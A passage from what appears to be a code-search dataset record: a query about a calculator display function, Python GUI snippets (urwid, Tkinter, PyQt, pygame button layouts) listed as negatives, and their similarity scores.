'~/qjob/job')\n\t\tself.jobnumber_edit = urwid.IntEdit( (\"editcp\", \"job number:\"), 0)\n\t\tself.job_content_reset_button = urwid.Button(\"Job Content Reset\", self.job_content_reset)\n\t\tself.exit_button = urwid.Button(\"Exit\", self.program_exit)\n\t\tself.job_edit = urwid.Edit( ('editcp',\"\"), multiline=True )\n\t\t\n\t\tself.items = [\n\t\turwid.Padding(\n\t\t\turwid.Columns(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.walltime_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap( self.nodes_edit, 'editbx', 'editfc'),\n\t\t\t\turwid.AttrWrap( self.myri_ppn_edit, 'editbx', 'editfc'),\n\t\t\t\t],\n\t\t\t\t2 ), \n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.Columns(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.workdir_edit, 'editbx', 'editfc' ), \n\t\t\t\turwid.AttrWrap( self.runtime_output_checkbox, 'buttn', 'buttnf'),\n\t\t\t\t],\n\t\t\t\t2),\n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.AttrWrap( self.other_options_edit, 'editbx', 'editfc' ), ('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.GridFlow(\n\t\t\t\t[\n\t\t\t\turwid.AttrWrap( self.source_bash_profile_checkbox, 'buttn','buttnf'),\n\t\t\t\turwid.AttrWrap( self.just_write_down_checkbox, 'buttn', 'buttnf'),\n\t\t\t\turwid.AttrWrap( self.jobname_prefix_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap( self.jobnumber_edit, 'editbx', 'editfc' ),\n\t\t\t\turwid.AttrWrap(self.job_content_reset_button, 'buttn', 'buttnf'),\n\t\t\t\turwid.AttrWrap(self.exit_button, 'buttn', 'buttnf'),\n\t\t\t\t],\n\t\t\t\t34, 2, 1, 'left'),\n\t\t\t('fixed left',2), ('fixed right',2)),\n\t\tblank,\n\t\turwid.Padding(\n\t\t\turwid.Pile(\n\t\t\t[\n\t\t\turwid.Text('One line one job. One job with >1 commands put on one line, separated by ;'),\n\t\t\turwid.AttrWrap(self.job_edit, 'editbx', 'editfc'),\n\t\t\t], 1),\n\t\t\t('fixed left',2), ('fixed right',2) )\n\t\t\t\n\t\t]\n\t\t\n\t\tself.listbox = urwid.ListBox( self.items )\n\t\t\n\t\tinstruct = urwid.Text(\"Job submission program based on Urwid. F8 to submit, F12 to quit.\")\n\t\theader = urwid.AttrWrap( instruct, 'header' )\n\t\t\n\t\tself.footer_text = urwid.Text(\"Mar 15th, 2008 by Yu Huang\")\n\t\tfooter = urwid.AttrWrap(self.footer_text, 'footer')\n\t\t\n\t\tself.top_frame = urwid.Frame(urwid.AttrWrap(self.listbox, 'body'), header, footer)", "def layout(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def render(self):\n pass", "def initCentralUic(self):\n self.initFileTableWidget()\n self.initViewerStack()\n self.splitter.setSizes([150, 850])", "def build_ui(self):\n\n self.frame.columnconfigure(0, pad=20)\n self.frame.columnconfigure(1, pad=20)\n\n\n self.frame.rowconfigure(0, pad=3)\n self.frame.rowconfigure(1, pad=3)\n self.frame.rowconfigure(2, pad=3)\n\n p1_label = Label(self.frame)\n p1_label[\"text\"] = \"Player 1\"\n p1_label.grid(row=0, column=0)\n\n p2_label = Label(self.frame)\n p2_label[\"text\"] = \"Player 2\"\n p2_label.grid(row=0, column=1)\n\n self.lb1 = Listbox(self.frame)\n for script in self.ai_list:\n self.lb1.insert(END, script)\n self.lb1.grid(row=1, column=0)\n\n self.lb1.selection_set(0)\n self.lb1[\"exportselection\"] = 0\n\n self.lb2 = Listbox(self.frame)\n for script in self.ai_list:\n self.lb2.insert(END, script)\n self.lb2.grid(row=1, column=1)\n\n self.lb2.selection_set(0)\n self.lb2[\"exportselection\"] = 0\n\n start_game_button = Button(self.frame)\n start_game_button[\"text\"] = \"Start Game\"\n start_game_button[\"command\"] = self.start_game\n start_game_button.grid(row=2, column=0)\n\n self.check_box = Checkbutton(self.frame, text=\"Draw UI\",variable=self.ui_draw)\n self.check_box.grid(row=2,column=1)\n\n self.frame.pack()", "def getControls(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def run(self):", "def setUI(self):\n \n l = QtGui.QLabel(\"Open file:\")\n browseButton = QtGui.QPushButton(\"Browse\")\n analyzeButton = QtGui.QPushButton(\"Analyse\")\n self.filelabel = QtGui.QLabel(\"\")\n self.messageLabel = QtGui.QLabel(\"\")\n \n #camera intrasec values\n self.fxlabel = QtGui.QLabel('focal x')\n self.fylabel = QtGui.QLabel('focal y')\n self.dist1label = QtGui.QLabel('K1')\n self.dist2label = QtGui.QLabel('K2')\n self.dist3label = QtGui.QLabel('P1')\n self.dist4label = QtGui.QLabel('P2')\n\n #set layout\n self.grid = QtGui.QGridLayout()\n a = self.grid.addWidget\n a(l, 0,0)\n a(browseButton, 0,2)\n a(self.filelabel,0,1)\n a(self.messageLabel, 1,0,1,4)\n a(analyzeButton, 2,0,1,4)\n\n a(self.fxlabel, 3,0)\n a(self.fylabel, 3,1)\n a(self.dist1label, 4,0)\n a(self.dist2label, 5,0)\n a(self.dist3label, 6,0)\n a(self.dist4label, 7,0)\n\n self.setLayout(self.grid)\n\n\n #connect signals to methods\n self.connect(browseButton, QtCore.SIGNAL('clicked()'), self.onOpenFileClicked)\n self.connect(analyzeButton, QtCore.SIGNAL('clicked()'), self.startAnalyze)", "def __init__(self, parent):\r\n Frame.__init__(self, parent) \r\n \r\n self.parent = parent\r\n self.initUI()", "def create_widgets(self):\n # self.var_spherical = IntVar()\n # self.var_3d = IntVar()\n # self.var_spatial_audio = IntVar()\n # self.button_open[\"command\"] = self.action_open\n # self.button_inject[\"command\"] = self.action_inject\n pass", "def create_widgets(self):\n #create description label\n Label(self,\n text = \"Patient Info:\"\n ).grid(row = 0, column = 0, sticky = W)", "def pick_up(self):", "def _init_ui(self):\n\n hlayout = QtWidgets.QHBoxLayout()\n\n label = QtWidgets.QLabel('Kies een normtraject:')\n\n hlayout.addWidget(label)\n\n self.section_combobox = QtWidgets.QComboBox()\n self.section_combobox.setFixedWidth(60)\n self.section_ids = sorted([''] + io.geometry.import_section_ids(self.datadir))\n self.section_combobox.addItems(self.section_ids)\n\n hlayout.addWidget(self.section_combobox)\n\n self.add_button = QtWidgets.QPushButton('Toevoegen', clicked=self._add_flooddefence)\n\n hlayout.addWidget(self.add_button)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addLayout(hlayout)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n self.close_button = QtWidgets.QPushButton('Sluiten', clicked=self.close)\n vlayout.addWidget(self.close_button, 0, QtCore.Qt.AlignRight)\n\n self.setLayout(vlayout)\n\n self.setWindowTitle(\"HB Havens: normtrajecten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)", "def main():\n \n cities, coordinates, speedlimits, adjlist = data_for_app()\n \n ui(cities, coordinates, speedlimits, adjlist)", "def _init_ui(self):\n hlayout = QtWidgets.QHBoxLayout()\n\n hlayout.addWidget(QtWidgets.QLabel('Kies een normtraject:'))\n\n self.section_combobox = QtWidgets.QComboBox()\n self.section_combobox.setFixedWidth(60)\n self._update_combobox()\n\n hlayout.addWidget(self.section_combobox)\n\n self.remove_button = QtWidgets.QPushButton('Verwijderen', clicked=self._del_flooddefence)\n hlayout.addWidget(self.remove_button)\n\n vlayout = QtWidgets.QVBoxLayout()\n vlayout.addLayout(hlayout)\n\n line = QtWidgets.QFrame()\n line.setFrameShape(QtWidgets.QFrame.HLine)\n line.setFrameShadow(QtWidgets.QFrame.Sunken)\n\n vlayout.addWidget(line)\n\n self.close_button = QtWidgets.QPushButton('Sluiten', clicked=self.close)\n vlayout.addWidget(self.close_button, 0, QtCore.Qt.AlignRight)\n\n self.setLayout(vlayout)\n\n self.setWindowTitle(\"HB Havens: normtrajecten\")\n self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowContextHelpButtonHint)" ]
[ "0.8035472", "0.7076582", "0.70445716", "0.70445716", "0.679653", "0.6779092", "0.6768436", "0.67298573", "0.66679484", "0.6657647", "0.6619304", "0.6563466", "0.6519952", "0.6507672", "0.6497", "0.6435492", "0.6433124", "0.64304245", "0.6426558", "0.64145607", "0.6411895", "0.63966846", "0.63821864", "0.6378462", "0.63660645", "0.6329955", "0.6319039", "0.6288673", "0.6279066", "0.62741995", "0.62629026", "0.6262061", "0.6244824", "0.62372714", "0.6230384", "0.6230384", "0.6230384", "0.621231", "0.62121016", "0.61987257", "0.6197478", "0.619624", "0.6176559", "0.6167978", "0.6162372", "0.6150112", "0.6143135", "0.61420125", "0.61417943", "0.61235595", "0.61145604", "0.61143094", "0.6093009", "0.6090125", "0.60880417", "0.6081076", "0.60786545", "0.60722893", "0.60722893", "0.60712576", "0.60683936", "0.60640395", "0.6063467", "0.60562503", "0.60538983", "0.60519123", "0.60452074", "0.6041096", "0.60296243", "0.6026632", "0.6004169", "0.6004159", "0.6003965", "0.60016537", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.6000898", "0.59876895", "0.5985827", "0.59832495", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.5982789", "0.59820217", "0.5979457", "0.5976639", "0.5975319", "0.5973593", "0.5969149", "0.5957561", "0.5956354" ]
0.0
-1
This will add to the display, and be the go to function of most buttons. We'll want to add in conditions for what buttons go.
def add(text): orig = dispb["text"] new = orig + text ops = ["+","-","*","/"] # conditions # length 21 if len(new) > 21: dispb["text"] = orig return 0 # one calc at a time if len(orig) > 0: if (orig[-1] in ops) & (text in ops): dispb["text"] = orig return 0 dispb["text"] = new return 0
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def display(self):\n\t\tprint('The button in the window was clicked!')", "def show_main_buttons(self):\n pass", "def _add_buttons(self, gui):\n gui.greet_button.pack()\n gui.close_button.pack()\n gui.buttons_on.set(True)", "def load_buttons(self):\n self.playing_buttons.append(Button(20, 40, 100, 40, \"New Game\"))", "def battle_screen_history_bar_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n\n\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n if int(number) == 1:\n button_text = Button(text,'', (0,0,0),250, 0, 600, 30, font_size = 13, alpha = 100)\n button_text.update()\n button_text.draw(screen)\n else:\n pass\n\n button_details = Button('+','', (0,0,0),850, 0, 100, 30,font_size = 25, alpha = 100)\n button_details.update()\n button_details.draw(screen)\n\n if button_status.battle_screen_history_bar_detail_display == True:\n i = 0\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n\n if int(number) % 2 == 1 and text != '':\n if text == \"Game Started!\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_odd = Button(text,'', (160,0,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n else:\n button_odd = Button(text,'', (160,160,160),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif int(number) % 2 == 0 and text != '':\n if text == \"Game Started!\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_even = Button(text,'', (160,0,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n else:\n button_even = Button(text,'', (130,130,130),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1", "def battle_screen_my_hand_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if screen_status.battle_screen_action_indicator != 'stage-0':\n # Page forward button\n button1 = Button('>','', (0,0,0),1100, 660, 50, 50)\n # Edge cases when len() = 14,28,42 ...\n if len(user.hand_list) % 7 == 0 and len(user.hand_list) != 0:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Normal cases\n else:\n if screen_status.battle_screen_my_hand_page_id != ((len(user.hand_list))//7 + 1): # Make sure on the last page no foreward button shows up\n button1.update()\n button1.draw(screen)\n # Page backward button\n button2 = Button('<', '' ,(0,0,0),50, 660, 50, 50)\n if screen_status.battle_screen_my_hand_page_id != 1: # Make sure on the first page no backward button shows up\n button2.update()\n button2.draw(screen)\n #\n if button_status.battle_screen_my_hand_page_change_button_backend:\n buttons.extend((button1,button2))\n button_status.battle_screen_my_hand_page_change_button_backend = False\n if ((screen_status.battle_screen_action_indicator == 'stage-1-level-up'\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and 'detail' in screen_status.battle_screen_action_indicator)\n or 'stage-2-other-action-detail-spawn' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-think-fast' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-equip' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-sneak' in screen_status.battle_screen_action_indicator\n or 'stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n and (screen_status.battle_screen_player2_action_display_indicator == False)):\n if button_status.battle_screen_my_hand_indicator_display == True:\n located_card = user.hand_list[7*(screen_status.battle_screen_my_hand_page_id - 1)+(int(button_status.battle_screen_my_hand_indicator_position)-1)]\n\n button_top = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y - 5, 140, 5)\n button_top.update()\n button_top.draw(screen)\n\n button_bottom = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y + 180, 140, 5)\n button_bottom.update()\n button_bottom.draw(screen)\n\n button_left = Button('','', (250,0,0),located_card.rect.x-5, located_card.rect.y, 5, 180)\n button_left.update()\n button_left.draw(screen)\n\n button_right = Button('','', (250,0,0),located_card.rect.x + 130, located_card.rect.y , 5, 180)\n button_right.update()\n button_right.draw(screen)\n # button_level_up = Button('***','battle_screen_handaction_****', (70,70,150),located_card.rect.x+10, located_card.rect.y - 27, 115, 27)\n # button_level_up.update()\n # button_level_up.draw(screen)", "def generate_buttons(self):\n raise Exception('Implement me!')", "def update_buttons(self):\n # Enable the Add/Remove step buttons if a Generator is loaded\n enable = self.mgr.obj is not None\n self.addButton.setEnabled(enable)\n self.removeButton.setEnabled(enable)\n self.upButton.setEnabled(enable)\n self.downButton.setEnabled(enable)", "def addStdButtons (self,frame):\n \n # Create the ok and cancel buttons.\n self.ok = ok = Tk.Button(frame,text=\"Go\",width=6,command=self.go)\n self.hide = hide = Tk.Button(frame,text=\"Hide\",width=6,command=self.hide)\n \n ok.pack(side=\"left\",pady=2,padx=5)\n hide.pack(side=\"left\",pady=2,padx=5)", "def step_button(self):\r\n self.update_settings()\r\n self.set_val(\"display_move\")\r\n if self.step_call is not None:\r\n self.step_call()", "def _addActionsToMoveButtons(self) -> None:\n self._goBackBtn.setDefaultAction(self._goBackAction)\n self._goUpBtn.setDefaultAction(self._goUpAction)\n self._goForwardBtn.setDefaultAction(self._goForwardAction)", "def sprint(self):\n self.buttons = []\n self.screen.blit(self.background_image, (0, 0))\n self.create_button((self.width // 2 - 257, self.height // 8 - 85), 501, 200, Colors.BLACK, \"20L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 3 - 81), 501, 200, Colors.BLACK, \"40L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 5 - 86), 501, 200, Colors.BLACK, \"100L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 7 - 85), 501, 200, Colors.BLACK, \"1000L\")\n self.show_buttons()\n self.show_text_in_buttons()\n pygame.display.flip()", "def battle_screen_character_1_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n button_basic_info = Button('Lv: ' + user.character_card.level + ' HP: ' + user.character_card.health + ' Card #: ' + str(len(user.hand_list)),'', (0,0,0),1000, 0, 200, 30, alpha = 100)\n button_basic_info.update()\n button_basic_info.draw(screen)\n\n if ('stage-2-character-action-1' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,132,50,23,alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-2' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,155,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-3' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,178,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-other-action-' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False\n and 'detail' not in screen_status.battle_screen_action_indicator):\n x = screen_status.battle_screen_action_indicator.replace('stage-2-other-action-','')\n button_action_pointer = Button('>>','',(92,13,78),1000,220+23*(int(x)/10-1),50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)", "def lobby_screen_stable_button_display(ai_settings,grid, screen, buttons, screen_status, button_status, card_database_filter, user, player2):\n button_back = Button('Back','', (250,250,250),0, 0, 50, 50, font_size = 18, font_color = (0,0,0),alpha = 200)\n button_back.update()\n button_back.draw(screen)\n\n button1 = Button('Hello '+ user.name +'!','', (250,250,250),300, 0, 600, 50, font_size = 20, font_color = (0,0,0),alpha = 200)\n button1.update()\n button1.draw(screen)\n\n button_back = Button('Change Name','', (150,40,40),780, 10, 110, 30, font_size = 14,alpha = 200)\n button_back.update()\n button_back.draw(screen)\n # background for create game\n button2 = Button('','', (0,0,0),150, 580, 900, 181,alpha = 200)\n button2.update()\n button2.draw(screen)\n if button_status.lobby_screen_prepare_to_go_display == False:\n # Background for join existing game\n button3 = Button('','', (0,0,0),150, 70, 900, 500,alpha = 200)\n button3.update()\n button3.draw(screen)\n\n button4 = Button('Join an existing game:','', (0,0,0),400, 70, 400, 50, font_size = 20, alpha = 0)\n button4.update()\n button4.draw(screen)", "def welcome_screen_settings_menu_display(ai_settings,screen, buttons, screen_status, button_status):\n if button_status.welcome_screen_settings_display == True:\n\n button = Button('','', (0,0,0), 300, 300, 600, 400, alpha = 200)\n button.update()\n button.draw(screen)\n # Sound settings\n button_sound = Button('Sound: ','', (0,0,0), 330, 330, 150, 50, font_size = 40, alpha = 0)\n button_sound.update()\n button_sound.draw(screen)\n\n if ai_settings.sound_indicator == True:\n button_1 = Button('On','', (50,150,50), 510, 333, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 560, 333, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 510, 333, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 560, 333, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n # Music settings\n button_music = Button('Music: ','', (0,0,0), 330, 400, 150, 50, font_size = 40, alpha = 0)\n button_music.update()\n button_music.draw(screen)\n\n if ai_settings.music_indicator == True:\n button_1 = Button('On','', (50,150,50), 510, 403, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,150,150), 560, 403, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n else:\n button_1 = Button('On','', (150,150,150), 510, 403, 40, 40)\n button_1.update()\n button_1.draw(screen)\n\n button_2 = Button('Off','', (150,50,50), 560, 403, 40, 40)\n button_2.update()\n button_2.draw(screen)\n\n # Theme settings\n button_theme = Button('Theme: ','', (0,0,0), 330, 470, 160, 50, font_size = 40, alpha = 0)\n button_theme.update()\n button_theme.draw(screen)\n\n if ai_settings.theme_indicator == 'Lith Harbor':\n button_1 = Button('Lith Harbor','', (50,150,50), 510, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Lith Harbor','', (150,150,150), 510, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Leafre':\n button_1 = Button('Leafre','', (50,150,50), 670, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Leafre','', (150,150,150), 670, 470, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Pantheon':\n button_1 = Button('Pantheon','', (50,150,50), 510, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Pantheon','', (150,150,150), 510, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.theme_indicator == 'Ellinia':\n button_1 = Button('Ellinia','', (50,150,50), 670, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Ellinia','', (150,150,150), 670, 540, 140, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n # AI speeding settings\n button_ai_speed = Button('AI Speed: ','', (0,0,0), 330, 620, 200, 50, font_size = 40, alpha = 0)\n button_ai_speed.update()\n button_ai_speed.draw(screen)\n\n if ai_settings.AI_speed_indicator == '1000':\n button_1 = Button('Fast','', (50,150,50), 550, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Fast','', (150,150,150), 550, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '2000':\n button_1 = Button('Normal','', (50,150,50), 650, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Normal','', (150,150,150), 650, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n if ai_settings.AI_speed_indicator == '3000':\n button_1 = Button('Slow','', (50,150,50), 750, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n else:\n button_1 = Button('Slow','', (150,150,150), 750, 620, 80, 50, font_size = 18)\n button_1.update()\n button_1.draw(screen)\n\n # Closed settings window button\n button_1 = Button('X','', (250,100,100), 870, 300, 30, 30, font_size = 18)\n button_1.update()\n button_1.draw(screen)", "def arrange_button(self):\r\n self.update_settings()\r\n if self.arrange_call is not None:\r\n self.arrange_call()", "def drawButtons(self):\n self.__pausedTitle.draw(self.__screen)\n self.__exitGameButton.draw(self.__screen)\n self.__resumeButton.draw(self.__screen)\n self.__mainMenuButton.draw(self.__screen)", "def normal_run(self):\n super().events_buttons(back=True)\n self.events_delete_btns()\n self.draw()", "def place_buttons(self):\n tk.Button(self.parent, text='^', command=self.up_callback).grid(row=0, column=1)\n tk.Button(self.parent, text='v', command=self.down_callback).grid(row=2, column=1)\n tk.Button(self.parent, text='>', command=self.right_callback).grid(row=1, column=2)\n tk.Button(self.parent, text='<', command=self.left_callback).grid(row=1, column=0)\n tk.Button(self.parent, text='<-', command=self.back_callback).grid(row=0, column=0)\n tk.Button(self.parent, text='OK', command=self.ok_callback).grid(row=1, column=1)\n tk.Button(self.parent, text='<<', command=self.rewind_callback).grid(row=3, column=0)\n tk.Button(self.parent, text='>||', command=self.pp_callback).grid(row=3, column=1)\n tk.Button(self.parent, text='>>', command=self.pp_callback).grid(row=3, column=2)\n\n tk.Button(self.parent, text='HOME', command=self.home_callback).grid(row=0, column=3)", "def lobby_screen_room_detail_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n\n if button_status.lobby_screen_room_detail_display == 'none':\n\n if button_status.lobby_screen_room_list_display == 'N/A':\n button5 = Button('Create a game:','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n button3 = Button('CREATE','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n else:\n button5 = Button('Please join the existing game!','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n\n\n elif button_status.lobby_screen_room_detail_display == 'my':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(user.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(user.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == False:\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('NEXT','', (120,120,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button3 = Button('NEXT','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n else:\n if button_status.lobby_screen_my_ready_to_go == False:\n\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_my_ready_to_go == True:\n if button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('PLAY!','', (247, 201, 37),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('WAIT!','', (40, 40, 120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n elif button_status.lobby_screen_room_detail_display == 'other':\n\n if button_status.lobby_screen_room_status == '1/2':\n button5 = Button(player2.name + \"'s game:\" + ' 1/2','', (0,0,0),400, 580, 400, 50, font_size = 20,font_color = (200,100,100), alpha = 0)\n button5.update()\n button5.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n button5 = Button(player2.name + \"'s game:\" + ' 2/2','', (0,0,0),400, 580, 400, 50, font_size = 20, alpha = 0)\n button5.update()\n button5.draw(screen)\n\n if button_status.lobby_screen_my_ready_to_go == False:\n button3 = Button(player2.name,'', (200,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_my_ready_to_go == True:\n button3 = Button(player2.name,'', (110,200,110),205, 635, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n\n if button_status.lobby_screen_room_status == '1/2':\n button3 = Button('Empty','', (250,250,250),205, 680, 650, 35,alpha = 100)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_room_status == '2/2':\n\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button(user.name,'', (200,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button(user.name,'', (110,200,110),205, 680, 650, 35,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n if button_status.lobby_screen_prepare_to_go_display == True:\n if button_status.lobby_screen_other_ready_to_go == False:\n button3 = Button('READY!','', (40,120,40),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n elif button_status.lobby_screen_other_ready_to_go == True:\n button3 = Button('WAIT...','', (40,40,120),920, 607, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)\n\n button3 = Button('QUIT','', (120,40,40),920, 684, 100, 50,alpha = 240)\n button3.update()\n button3.draw(screen)", "def battle_screen_battleground_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n if ('stage-2-other-action-detail-tactic-1' in screen_status.battle_screen_action_indicator\n or ('stage-2-character-action-' in screen_status.battle_screen_action_indicator and '-detail-tactic-1' in screen_status.battle_screen_action_indicator)\n or 